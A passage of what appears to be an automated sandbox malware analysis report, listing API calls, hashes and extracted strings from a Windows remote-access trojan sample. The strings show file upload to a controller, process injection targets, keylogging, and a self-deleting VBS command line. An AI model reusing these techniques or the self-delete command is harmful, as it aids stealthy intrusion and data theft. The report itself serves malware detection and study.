                        • WriteFile.KERNEL32(00000000,0046FAA6,00000002,00000000,00000000), ref: 00401B87
                        • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401B97
                        • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BA7
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$Write$Create
                        • String ID: RIFF$WAVE$data$fmt
                        • API String ID: 1602526932-4212202414
                        • Opcode ID: e953cdad80a2b5f15463d19f06cbbe214ca4708b9acf4e214683fef01c63ba87
                        • Instruction ID: fa9573d22dfebaa7cc70b9682dc8642ba3498ee27ac2ec60dc87a96e6c13d219
                        • Opcode Fuzzy Hash: e953cdad80a2b5f15463d19f06cbbe214ca4708b9acf4e214683fef01c63ba87
                        • Instruction Fuzzy Hash: 46416F726543197AE210DB91DD85FBB7EECEB85B50F40042AF648D6080E7A4E909DBB3
                        Function 004137DC Relevance: 26.4, APIs: 9, Strings: 6, Instructions: 109libraryloaderCOMMON
                        Download Yara Rule
                        APIs
                        • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0041382B
                        • LoadLibraryA.KERNEL32(?), ref: 0041386D
                        • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 0041388D
                        • FreeLibrary.KERNEL32(00000000), ref: 00413894
                        • LoadLibraryA.KERNEL32(?), ref: 004138CC
                        • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 004138DE
                        • FreeLibrary.KERNEL32(00000000), ref: 004138E5
                        • GetProcAddress.KERNEL32(00000000,?), ref: 004138F4
                        • FreeLibrary.KERNEL32(00000000), ref: 0041390B
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Library$AddressFreeProc$Load$DirectorySystem
                        • String ID: \ws2_32$\wship6$`3A$freeaddrinfo$getaddrinfo$getnameinfo
                        • API String ID: 2490988753-3443138237
                        • Opcode ID: 21b812c9e8c8c8e619d1227956d82128857f9ec353fd6b4c7c84cf26c4fc7a8e
                        • Instruction ID: d28fd91e0c22c3548fe93de424e57890752fc739e59a71d3c7449bb4191d4936
                        • Opcode Fuzzy Hash: 21b812c9e8c8c8e619d1227956d82128857f9ec353fd6b4c7c84cf26c4fc7a8e
                        • Instruction Fuzzy Hash: 8831C0B2502315ABC720AF25DC489CBBBEC9F48755F41062AF84593251E7B8CE8486AE
                        Function 0044C60D Relevance: 25.9, APIs: 17, Instructions: 419COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: _free$EnvironmentVariable$_wcschr
                        • String ID:
                        • API String ID: 3899193279-0
                        • Opcode ID: 8f8f6bf8198f661361f87136ecb7ebf93a417bae196628050410ce4dfb3fc85f
                        • Instruction ID: f90cfe9d57a3c7213274ca364bab7ea13f4483d5bd7e80e8c07ab134bc70d503
                        • Opcode Fuzzy Hash: 8f8f6bf8198f661361f87136ecb7ebf93a417bae196628050410ce4dfb3fc85f
                        • Instruction Fuzzy Hash: 80D136719023007BFB60AF7598C166B7BA4AF15718F09817FF985A7381FB3989008B5D
                        Function 0044E4A6 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 114COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • ___free_lconv_mon.LIBCMT ref: 0044E4EA
                          • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D6FF
                          • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D711
                          • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D723
                          • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D735
                          • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D747
                          • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D759
                          • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D76B
                          • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D77D
                          • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D78F
                          • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D7A1
                          • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D7B3
                          • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D7C5
                          • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D7D7
                        • _free.LIBCMT ref: 0044E4DF
                          • Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
                          • Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA
                        • _free.LIBCMT ref: 0044E501
                        • _free.LIBCMT ref: 0044E516
                        • _free.LIBCMT ref: 0044E521
                        • _free.LIBCMT ref: 0044E543
                        • _free.LIBCMT ref: 0044E556
                        • _free.LIBCMT ref: 0044E564
                        • _free.LIBCMT ref: 0044E56F
                        • _free.LIBCMT ref: 0044E5A7
                        • _free.LIBCMT ref: 0044E5AE
                        • _free.LIBCMT ref: 0044E5CB
                        • _free.LIBCMT ref: 0044E5E3
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                        • String ID: pF
                        • API String ID: 161543041-2973420481
                        • Opcode ID: b166b7e86ef1a7ddfa2e36ec319a6e916c21ca5d81851e2e5517d42b5c42f7b7
                        • Instruction ID: 6e8371ae3b83bc2427c047bff221b97f6cd80994471b0a2caeb41cff5b169df7
                        • Opcode Fuzzy Hash: b166b7e86ef1a7ddfa2e36ec319a6e916c21ca5d81851e2e5517d42b5c42f7b7
                        • Instruction Fuzzy Hash: D4315072500304AFFB205E7AD945B5BB3E5BF00719F55851FE488D6251EE39ED408B18
                        Function 00411899 Relevance: 23.2, APIs: 9, Strings: 4, Instructions: 417sleepfileCOMMON
                        Download Yara Rule
                        APIs
                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 004118B2
                          • Part of subcall function 00419959: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040405C), ref: 00419980
                          • Part of subcall function 004168A6: CloseHandle.KERNEL32(004040D5,?,?,004040D5,00462E24), ref: 004168BC
                          • Part of subcall function 004168A6: CloseHandle.KERNEL32($.F,?,?,004040D5,00462E24), ref: 004168C5
                        • Sleep.KERNEL32(0000000A,00462E24), ref: 00411A01
                        • Sleep.KERNEL32(0000000A,00462E24,00462E24), ref: 00411AA3
                        • Sleep.KERNEL32(0000000A,00462E24,00462E24,00462E24), ref: 00411B42
                        • DeleteFileW.KERNEL32(00000000,00462E24,00462E24,00462E24), ref: 00411B9F
                        • DeleteFileW.KERNEL32(00000000,00462E24,00462E24,00462E24), ref: 00411BCF
                        • DeleteFileW.KERNEL32(00000000,00462E24,00462E24,00462E24), ref: 00411C05
                        • Sleep.KERNEL32(000001F4,00462E24,00462E24,00462E24), ref: 00411C25
                        • Sleep.KERNEL32(00000064), ref: 00411C63
                          • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                        • String ID: /stext "$$.F$@#G$@#G
                        • API String ID: 1223786279-2596709126
                        • Opcode ID: bd53cf9864bd20e9c524ce1cfd37af81de888470282f81bcb092bebe0936cb7c
                        • Instruction ID: f36e1428a9e5a2dc2e21cca38a330b771dfaab2ce7ac60874593ee94e899fa44
                        • Opcode Fuzzy Hash: bd53cf9864bd20e9c524ce1cfd37af81de888470282f81bcb092bebe0936cb7c
                        • Instruction Fuzzy Hash: 1CF154311083415AD328FB65D896AEFB3D5AFD0348F40093FF586521E2EF789A4DC69A
                        Function 0044D7E0 Relevance: 23.1, APIs: 12, Strings: 1, Instructions: 376COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: _free
                        • String ID: pF
                        • API String ID: 269201875-2973420481
                        • Opcode ID: 2d61484940682ee786660686f26dc7be5fdbe1d580820abb244bed0f912383bb
                        • Instruction ID: 42ad863364e9847d0c0ab7d3fc56807329b255bf3c924c15ca724e031f0c4a7b
                        • Opcode Fuzzy Hash: 2d61484940682ee786660686f26dc7be5fdbe1d580820abb244bed0f912383bb
                        • Instruction Fuzzy Hash: 4CC17576D40204ABEB20DFA9CC82FEE77F8AF09B05F154156FE04FB282D674A9458754
                        Function 0040DE34 Relevance: 23.0, APIs: 7, Strings: 6, Instructions: 223processsynchronizationCOMMON
                        Download Yara Rule
                        APIs
                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00472248,00471FFC,?,00000001), ref: 0040DE4E
                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000001), ref: 0040DE79
                        • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040DE95
                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040DF14
                        • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000001), ref: 0040DF23
                          • Part of subcall function 00419F87: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000), ref: 00419F9C
                        • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001), ref: 0040E047
                        • CloseHandle.KERNEL32(00000000,C:\Program Files(x86)\Internet Explorer\,?,00000001), ref: 0040E133
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseCreateHandleProcess32$FileFirstModuleMutexNameNextOpenProcessSnapshotToolhelp32
                        • String ID: 0"G$C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe$!G
                        • API String ID: 193334293-3226144251
                        • Opcode ID: cf6d12ac23d3bea58c4b9e5c443ef1de1d55369046223e9cec53eb66751e9ba7
                        • Instruction ID: 8a3cf51a80cb2752f7e3b1027b115d9c77e2b7a511041fa54b012784d9d6af0a
                        • Opcode Fuzzy Hash: cf6d12ac23d3bea58c4b9e5c443ef1de1d55369046223e9cec53eb66751e9ba7
                        • Instruction Fuzzy Hash: DB8121305083419BCA54FB61D8919EEB7E4AFA0348F40493FF586631E2EF78994DC75A
                        Function 0041A419 Relevance: 23.0, APIs: 6, Strings: 7, Instructions: 214registryCOMMON
                        Download Yara Rule
                        APIs
                        • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041A43B
                        • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041A47F
                        • RegCloseKey.ADVAPI32(?), ref: 0041A749
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseEnumOpen
                        • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                        • API String ID: 1332880857-3714951968
                        • Opcode ID: 202c19da245d775da939d21b29cef2875a47ec0cac4e3383d9ae15c6a26c9ad4
                        • Instruction ID: 699f57f5c891f1d806a7f6c627c3d9f808e7165cae3c76f1f7c8ebce292c0808
                        • Opcode Fuzzy Hash: 202c19da245d775da939d21b29cef2875a47ec0cac4e3383d9ae15c6a26c9ad4
                        • Instruction Fuzzy Hash: BC8152311183419BC328EB51D891EEFB7E8EF94348F10493FF586921E2EF749949CA5A
                        Function 0041B344 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 74windowCOMMON
                        Download Yara Rule
                        APIs
                        • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041B38F
                        • GetCursorPos.USER32(?), ref: 0041B39E
                        • SetForegroundWindow.USER32(?), ref: 0041B3A7
                        • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041B3C1
                        • Shell_NotifyIconA.SHELL32(00000002,00471AE0), ref: 0041B412
                        • ExitProcess.KERNEL32 ref: 0041B41A
                        • CreatePopupMenu.USER32 ref: 0041B420
                        • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041B435
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                        • String ID: Close
                        • API String ID: 1657328048-3535843008
                        • Opcode ID: a6176c0d6380f4aee2a94f66beec31abf772cd011930890969aeab0fce4376ca
                        • Instruction ID: 8a5f592793453ec618f968136b1e584160f7030753e38ead18fcaf25e3e96fa7
                        • Opcode Fuzzy Hash: a6176c0d6380f4aee2a94f66beec31abf772cd011930890969aeab0fce4376ca
                        • Instruction Fuzzy Hash: EB211B31110209BFDF054FA4ED0DAAA3F75FB04302F458125F906D2176D7B5D9A0AB59
                        Function 00443268 Relevance: 22.8, APIs: 15, Instructions: 296COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: _free$Info
                        • String ID:
                        • API String ID: 2509303402-0
                        • Opcode ID: fdea39b954b1f5acf66d6067823d5c965f1ccd743e2f457f67106af727a2ce82
                        • Instruction ID: c21780bae5ed168c96e0403295faec6c801d35bf5d84feaa2b3ea2b847582f92
                        • Opcode Fuzzy Hash: fdea39b954b1f5acf66d6067823d5c965f1ccd743e2f457f67106af727a2ce82
                        • Instruction Fuzzy Hash: 70B1D171900305AFEB11DF69C881BEEBBF4BF08705F14456EF588A7342DB799A418B24
                        Function 00407BB6 Relevance: 19.6, APIs: 8, Strings: 3, Instructions: 328fileCOMMON
                        Download Yara Rule
                        APIs
                        • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00407D1F
                        • GetFileSizeEx.KERNEL32(00000000,?), ref: 00407D57
                        • __aulldiv.LIBCMT ref: 00407D89
                          • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                          • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                        • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00407EAC
                        • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00407EC7
                        • CloseHandle.KERNEL32(00000000), ref: 00407FA0
                        • CloseHandle.KERNEL32(00000000,00000052), ref: 00407FEA
                        • CloseHandle.KERNEL32(00000000), ref: 00408038
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                        • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller:
                        • API String ID: 3086580692-2596673759
                        • Opcode ID: 3628a73cbb86b5736265ac293d311146e85fdcb2316ed178213f0337e0fbe7ae
                        • Instruction ID: 8e1224200a6c450cfdafa1dd663dcbd78fa1a86951e699dbe30fbedc525f5c9c
                        • Opcode Fuzzy Hash: 3628a73cbb86b5736265ac293d311146e85fdcb2316ed178213f0337e0fbe7ae
                        • Instruction Fuzzy Hash: 05B191316083409BC354FB65C891AAFB7E9AFD4314F40492FF489622D2EF789D458B8B
                        Function 0040C3B8 Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 148COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 004112B5: TerminateProcess.KERNEL32(00000000,?,0040C3C8), ref: 004112C5
                          • Part of subcall function 004112B5: WaitForSingleObject.KERNEL32(000000FF,?,0040C3C8), ref: 004112D8
                          • Part of subcall function 004120E8: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,origmsc), ref: 00412104
                          • Part of subcall function 004120E8: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,000003E8,?), ref: 0041211D
                          • Part of subcall function 004120E8: RegCloseKey.ADVAPI32(00000000), ref: 00412128
                        • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040C412
                        • ShellExecuteW.SHELL32(00000000,open,00000000,00469654,00469654,00000000), ref: 0040C571
                        • ExitProcess.KERNEL32 ref: 0040C57D
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                        • String ID: """, 0$.vbs$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$H"G$Temp$exepath$open
                        • API String ID: 1913171305-2600661426
                        • Opcode ID: c86d61277acc14c68f24433c0b654e0e29c296f6a8d4ad8667fc6f6870691cc8
                        • Instruction ID: b2ba4f5629099335deb4bd311fc34f74cd7c7cff7cc2b9b794c872af44b42b62
                        • Opcode Fuzzy Hash: c86d61277acc14c68f24433c0b654e0e29c296f6a8d4ad8667fc6f6870691cc8
                        • Instruction Fuzzy Hash: 214132319001185ACB14FBA2DC96DEE7778AF50708F50017FF506B71E2EE785E4ACA99
                        Function 004048A8 Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 144networkCOMMON
                        Download Yara Rule
                        APIs
                        • connect.WS2_32(?,?,?), ref: 004048C0
                        • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 004049E0
                        • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 004049EE
                        • WSAGetLastError.WS2_32 ref: 00404A01
                          • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateEvent$ErrorLastLocalTimeconnect
                        • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                        • API String ID: 994465650-2151626615
                        • Opcode ID: b56ab407b7d85cc5e8983cef37c9724a1f5c45cc3ea0a996f87df1f4b9ef746f
                        • Instruction ID: f1749a2af40dec866484330b2464a30bcc7489b9f615ba144f2b3c776ade1d80
                        • Opcode Fuzzy Hash: b56ab407b7d85cc5e8983cef37c9724a1f5c45cc3ea0a996f87df1f4b9ef746f
                        • Instruction Fuzzy Hash: 37412AB5B406017BD608777A8E1B96E7625AB81304B50017FF901136D2EBBD9C2197DF
                        Function 00452DBB Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00452A89: CreateFileW.KERNEL32(?,00000008,00000007,d.E,?,?,00000000,?,00452E64,00000000,0000000C), ref: 00452AA6
                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,FF8BC35D), ref: 00452ECF
                        • __dosmaperr.LIBCMT ref: 00452ED6
                        • GetFileType.KERNEL32(00000000), ref: 00452EE2
                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,FF8BC35D), ref: 00452EEC
                        • __dosmaperr.LIBCMT ref: 00452EF5
                        • CloseHandle.KERNEL32(00000000), ref: 00452F15
                        • CloseHandle.KERNEL32(00000000), ref: 0045305F
                        • GetLastError.KERNEL32 ref: 00453091
                        • __dosmaperr.LIBCMT ref: 00453098
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                        • String ID: H
                        • API String ID: 4237864984-2852464175
                        • Opcode ID: 474c31a6c8ccfba43807a2a750eddd9e1d52ca803bebdbe2fa86fef5e1c33935
                        • Instruction ID: def4621c7e831d5678052e1043e56ea9e2bfce8be848437acb5cac56d61a7e39
                        • Opcode Fuzzy Hash: 474c31a6c8ccfba43807a2a750eddd9e1d52ca803bebdbe2fa86fef5e1c33935
                        • Instruction Fuzzy Hash: CAA15832A101049FDF19EF68D8417AE7BB1AB0A325F14015FFC419B392DB798D1ACB5A
                        Function 00413606 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 158COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 65535$udp
                        • API String ID: 0-1267037602
                        • Opcode ID: 28a355c3c2c5299b67e9df14989e725b3f395b8ff7de4f3ce545a5dea485fe56
                        • Instruction ID: 74e44cdacc71272d4b4fe4479ff5a2c38cc960f39e0e81ce023821ae7ff597b0
                        • Opcode Fuzzy Hash: 28a355c3c2c5299b67e9df14989e725b3f395b8ff7de4f3ce545a5dea485fe56
                        • Instruction Fuzzy Hash: 3151F1F5209302ABD7209E15C809BBB77D4AB84B52F08842FF8A1973D0D76CDEC0965E
                        Function 00409C1F Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 156sleepCOMMON
                        Download Yara Rule
                        APIs
                        • __Init_thread_footer.LIBCMT ref: 00409C81
                        • Sleep.KERNEL32(000001F4), ref: 00409C8C
                        • GetForegroundWindow.USER32 ref: 00409C92
                        • GetWindowTextLengthW.USER32(00000000), ref: 00409C9B
                        • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 00409CCF
                        • Sleep.KERNEL32(000003E8), ref: 00409D9D
                          • Part of subcall function 0040962E: SetEvent.KERNEL32(?,?,00000000,0040A156,00000000), ref: 0040965A
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                        • String ID: [${ User has been idle for $ minutes }$]
                        • API String ID: 911427763-3954389425
                        • Opcode ID: a44f1e588b244d76f3851291f59a3d8a0f12b55ab3dd92a15c41ef104020a1a6
                        • Instruction ID: 7a62ae1493acfbf190be1d0992f15f5c774c3bdccfea44e4f2dca48363f02a21
                        • Opcode Fuzzy Hash: a44f1e588b244d76f3851291f59a3d8a0f12b55ab3dd92a15c41ef104020a1a6
                        • Instruction Fuzzy Hash: 7C5193716043405BD304FB61D855A6EB795AF84308F50093FF486A62E3DF7CAE45C69A
                        Function 0040C5ED Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 139COMMON
                        Download Yara Rule
                        APIs
                        • GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 0040C753
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: LongNamePath
                        • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                        • API String ID: 82841172-425784914
                        • Opcode ID: 611eacb1f2b12eabfa35ce51232d41e6553fe8371d81c53e9ab5b340c3cd037e
                        • Instruction ID: e0747f7f0ded3e76473395fd4b63a7f1dfd4675be44f898a7a0c8db3d1efc66a
                        • Opcode Fuzzy Hash: 611eacb1f2b12eabfa35ce51232d41e6553fe8371d81c53e9ab5b340c3cd037e
                        • Instruction Fuzzy Hash: EB4168315042419AC204FB62DC929EFB7E8AEA4759F10063FF541720E2EF799E49C99F
                        Function 004385DA Relevance: 16.6, APIs: 11, Instructions: 116COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00438632
                        • GetLastError.KERNEL32(?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043863F
                        • __dosmaperr.LIBCMT ref: 00438646
                        • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00438672
                        • GetLastError.KERNEL32(?,?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043867C
                        • __dosmaperr.LIBCMT ref: 00438683
                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D35,?), ref: 004386C6
                        • GetLastError.KERNEL32(?,?,?,?,?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004386D0
                        • __dosmaperr.LIBCMT ref: 004386D7
                        • _free.LIBCMT ref: 004386E3
                        • _free.LIBCMT ref: 004386EA
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                        • String ID:
                        • API String ID: 2441525078-0
                        • Opcode ID: 754b37205d6cd88dea2e57a046153fac0b2c26eaf77bc51e198666fb1f449e95
                        • Instruction ID: 210192a7601cd99409c426d56dfac4e8df60f1af96207b6eb293af60208c7bc2
                        • Opcode Fuzzy Hash: 754b37205d6cd88dea2e57a046153fac0b2c26eaf77bc51e198666fb1f449e95
                        • Instruction Fuzzy Hash: 4E31B17280030ABBDF11AFA5DC469AF7B69AF08325F10425EF81056291DF39CD11DB69
                        Function 0044DC05 Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 204COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: _free
                        • String ID: pF$tF
                        • API String ID: 269201875-2954683558
                        • Opcode ID: 0017408d32ff71f8327e26c25c7248eb33913fce7ae2350609d9814c511e4433
                        • Instruction ID: 6443803da38cddfc03973e112e1470be20db66c409a4168417c9ccfa39c85508
